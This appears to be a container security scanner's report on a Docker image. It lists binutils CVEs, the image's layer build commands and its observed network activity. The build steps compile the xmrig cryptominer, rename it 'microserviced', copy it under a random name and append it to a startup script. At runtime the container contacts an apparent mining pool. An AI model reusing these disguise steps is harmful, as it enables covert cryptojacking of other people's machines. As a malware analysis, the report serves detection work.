Low CVE-2018-18701 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: infinite recursion in next_is_type_qual and cplus_demangle_type functions in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-19931 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Heap-based buffer overflow in bfd_elf32_swap_phdr_in function resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-19932 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Integer overflow due to the IS_CONTAINED_BY_LMA macro resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20002 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: memory leak in _bfd_generic_read_minisymbols function in syms.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20623 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Use-after-free in the error function binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20651 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf_link_add_object_symbols function resulting in a denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-20671 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Integer overflow in load_specific_debug_section function binutils:2.30-20ubuntu2~18.04
Low CVE-2018-8945 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Crash in elf.c:bfd_section_from_shdr() with crafted executable binutils:2.30-20ubuntu2~18.04
Low CVE-2018-9138 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack Exhaustion in the the C++ demangling functions provided by libiberty binutils:2.30-20ubuntu2~18.04
Low CVE-2019-12972 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out-of-bounds read in setup_group in bfd/elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-17450 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: denial of service via crafted ELF file binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9070 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in function d_expression_1 in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9071 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: stack consumption in function d_count_templates_scopes in cp-demangle.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9073 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: excessive memory allocation in function _bfd_elf_slurp_version_tables in elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9074 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out-of-bound read in function bfd_getl32 in libbfd.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9075 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in function _bfd_archive_64_bit_slurp_armap in archive64.c binutils:2.30-20ubuntu2~18.04
Low CVE-2019-9077 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in function process_mips_specific in readelf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2020-16592 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.7binutils: use-after-free in bfd_hash_lookup could result in DoS binutils:2.30-20ubuntu2~18.04
Low CVE-2021-3487 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.7binutils: Excessive debug section size can cause excessive memory consumption in bfd's dwarf2.c read_section() binutils:2.30-20ubuntu2~18.04
Low CVE-2018-1000876 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leads to heap-based buffer overflow in objdump binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10372 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Heap-base buffer over-read in dwarf.c:process_cu_tu_index() allows for denial of service via crafted file binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10373 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in dwarf2.c:concat_filename() allows for denial of service via crafted file binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10534 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out of bounds memory write in peXXigen.c files binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-10535 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12641 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack Exhaustion in the demangling functions provided by libiberty binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12697 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in work_stuff_copy_to_from in cplus-dem.c. binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12698 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: excessive memory consumption in demangle_template in cplus-dem.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12699 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in finish_stab in stabs.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-12934 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in remember_Ktype in cplus-dem.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-13033 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in execution of nm binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17358 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in _bfd_stab_section_find_nearest_line in syms.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17359 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in bfd_zalloc in opncls.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17360 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in bfd_getl32 in libbfd.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17794 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in libiberty/cplus-dem.c:work_stuff_copy_to_from() via crafted input binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-17985 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack consumption problem caused by the cplus_demangle_type binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18309 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory address dereference in read_reloc in reloc.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18483 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Integer overflow in cplus-dem.c:get_count() allows for denial of service binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18484 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack exhaustion in cp-demangle.c allows for denial of service binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18605 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in sec_merge_hash_lookup in merge.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18606 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in _bfd_add_merge_section in merge_strings function in merge.c binutils-common:2.30-20ubuntu2~18.04
Low CVE-2018-18607 binutils-common 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf_link_input_bfd in elflink.c binutils-common:2.30-20ubuntu2~18.04

Command

ADD file:28c0771e44ff530dba3f237024acc38e8ec9293d60f0e44c8c78536c12f13a0b in /
Vulnerable packages, installed in this layer 5 years ago
apt 1.6.1 libapt-pkg5.0 1.6.1 libsystemd0 237-3ubuntu10 libudev1 237-3ubuntu10 bzip2 1.0.6-8.1 dpkg 1.19.0.5ubuntu2 e2fsprogs 1.44.1-1 gzip 1.6-5ubuntu1 libbz2-1.0 1.0.6-8.1 libc-bin 2.27-3ubuntu1 libc6 2.27-3ubuntu1 libcom-err2 1.44.1-1 libdb5.3 5.3.28-13.1ubuntu1 libext2fs2 1.44.1-1 libgnutls30 3.5.18-1ubuntu1 libhogweed4 3.4-1 libidn2-0 2.0.4-1.1build2 liblz4-1 0.0~r131-2ubuntu3 liblzma5 5.2.2-1.3 libnettle6 3.4-1

Command

RUN set -xe &&
    echo '#!/bin/sh' > /usr/sbin/policy-rc.d &&
    echo 'exit 101' >> /usr/sbin/policy-rc.d &&
    chmod +x /usr/sbin/policy-rc.d &&
    dpkg-divert --local --rename --add /sbin/initctl &&
    cp -a /usr/sbin/policy-rc.d /sbin/initctl &&
    sed -i 's/^exit.*/exit 0/' /sbin/initctl &&
    echo 'force-unsafe-io' > /etc/dpkg/dpkg.cfg.d/docker-apt-speedup &&
    echo 'DPkg::Post-Invoke { "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true"; };' > /etc/apt/apt.conf.d/docker-clean &&
    echo 'APT::Update::Post-Invoke { "rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true"; };' >> /etc/apt/apt.conf.d/docker-clean &&
    echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";' >> /etc/apt/apt.conf.d/docker-clean &&
    echo 'Acquire::Languages "none";' > /etc/apt/apt.conf.d/docker-no-languages &&
    echo 'Acquire::GzipIndexes "true"; Acquire::CompressionTypes::Order:: "gz";' > /etc/apt/apt.conf.d/docker-gzip-indexes &&
    echo 'Apt::AutoRemove::SuggestsImportant "false";' > /etc/apt/apt.conf.d/docker-autoremove-suggests

Command

RUN rm -rf /var/lib/apt/lists/*

Command

RUN sed -i 's/^#\s*\(deb.*universe\)$/\1/g' /etc/apt/sources.list

Command

RUN mkdir -p /run/systemd &&
    echo 'docker' > /run/systemd/container

Command

CMD ["/bin/bash"]

Command

RUN apt-get update &&
    apt-get install -y git curl build-essential cmake libuv1-dev libmicrohttpd-dev &&
    curl -sL https://deb.nodesource.com/setup_10.x | bash - &&
    apt-get install -y nodejs &&
    git clone -b qrl https://socialwrap@bitbucket.org/socialwrap/deadhash.git &&
    cd deadhash &&
    npm i &&
    git clone https://github.com/xmrig/xmrig.git &&
    cd xmrig &&
    mkdir build &&
    cd build &&
    cmake -DWITH_HTTPD=OFF -DCMAKE_BUILD_TYPE=Release .. &&
    make &&
    mv xmrig microserviced &&
    cp microserviced /deadhash &&
    cd /deadhash &&
    rm -rf xmrig
Vulnerable packages, installed in this layer 5 years ago
shell-quote 1.6.1 xmlhttprequest-ssl 1.5.3 libexpat1 2.2.5-3 libsasl2-2 2.1.27~101-g0780600+dfsg-3ubuntu2 libsasl2-modules 2.1.27~101-g0780600+dfsg-3ubuntu2 libsasl2-modules-db 2.1.27~101-g0780600+dfsg-3ubuntu2 libssl1.0.0 1.0.2n-1ubuntu5.1 libssl1.1 1.1.0g-2ubuntu4.1 linux-libc-dev 4.15.0-24.26 openssl 1.1.0g-2ubuntu4.1 engine.io 1.8.5 socket.io-parser 2.3.1 binutils 2.30-20ubuntu2~18.04 binutils-common 2.30-20ubuntu2~18.04 binutils-x86-64-linux-gnu 2.30-20ubuntu2~18.04 dirmngr 2.2.4-1ubuntu1.1 dpkg-dev 1.19.0.5ubuntu2 file 1:5.32-2ubuntu0.1 git-man 1:2.17.1-1ubuntu0.1 gnupg 2.2.4-1ubuntu1.1

Command

RUN apt-get clean &&
    apt-get purge -y git curl build-essential cmake

Command

WORKDIR /deadhash

Command

RUN export NAME=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1) &&
    cp microserviced $NAME &&
    echo "\n ./${NAME}" >> electrode.sh

Command

CMD ["/bin/sh" "-c" "npm start"]
The image downloads the following Git repository:
https://github.com/xmrig/xmrig.git
Dynamic Analysis Results
The following graph outlines the most important system events generated by the container:
The container made the following DNS requests:
RequestResponse
A → registry.npmjs.org A → 104.16.26.35
A → 104.16.22.35
A → 104.16.17.35
A → 104.16.24.35
A → 104.16.16.35
A → 104.16.21.35
A → 104.16.19.35
A → 104.16.23.35
A → 104.16.20.35
A → 104.16.25.35
A → 104.16.18.35
A → 104.16.27.35
AAAA → registry.npmjs.org AAAA → 2606:4700::6810:1323
AAAA → 2606:4700::6810:1723
AAAA → 2606:4700::6810:1923
AAAA → 2606:4700::6810:1523
AAAA → 2606:4700::6810:1423
AAAA → 2606:4700::6810:1823
AAAA → 2606:4700::6810:1023
AAAA → 2606:4700::6810:1b23
AAAA → 2606:4700::6810:1223
AAAA → 2606:4700::6810:1623
AAAA → 2606:4700::6810:1a23
AAAA → 2606:4700::6810:1123
AAAA → qrl.easyhash.io SOA → ns1.bodis.com
A → qrl.easyhash.io A → 199.59.243.220
The container attempts to connect to the following remote hosts:
IP address Domain Location Coordinates ASN organization
104.16.22.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.23.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.18.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.20.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.27.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.25.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
199.59.243.220 qrl.easyhash.io United States 37.751, -97.822 AMAZON-02
104.16.17.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.26.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.21.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.19.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.24.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
104.16.16.35 registry.npmjs.org San Francisco, United States 37.7621, -122.3971 Cloudflare, Inc.
The container produces the following text output:
user@host: ~